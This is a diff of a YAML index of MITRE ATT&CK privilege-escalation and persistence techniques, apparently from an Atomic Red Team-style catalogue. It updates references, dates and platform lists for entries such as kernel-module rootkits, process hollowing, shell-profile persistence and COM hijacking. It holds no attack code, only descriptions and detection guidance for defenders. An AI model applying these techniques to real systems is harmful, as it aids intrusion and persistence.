-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -20900,7 +21214,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20926,12 +21240,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -21009,9 +21321,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -21078,7 +21389,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -21152,11 +21462,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21173,7 +21482,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -21183,7 +21491,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21192,19 +21500,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -21252,11 +21558,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21324,23 +21631,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21403,11 +21709,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21460,8 +21765,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21509,78 +21814,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21628,6 +21866,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -21638,9 +21880,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -21649,8 +21895,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -21696,7 +22001,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21721,13 +22026,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21807,7 +22110,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -21843,7 +22145,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21866,12 +22168,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -21949,12 +22250,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -22015,7 +22315,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -22059,7 +22358,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -22081,7 +22380,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -22162,7 +22460,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -22185,7 +22482,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -22215,12 +22512,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
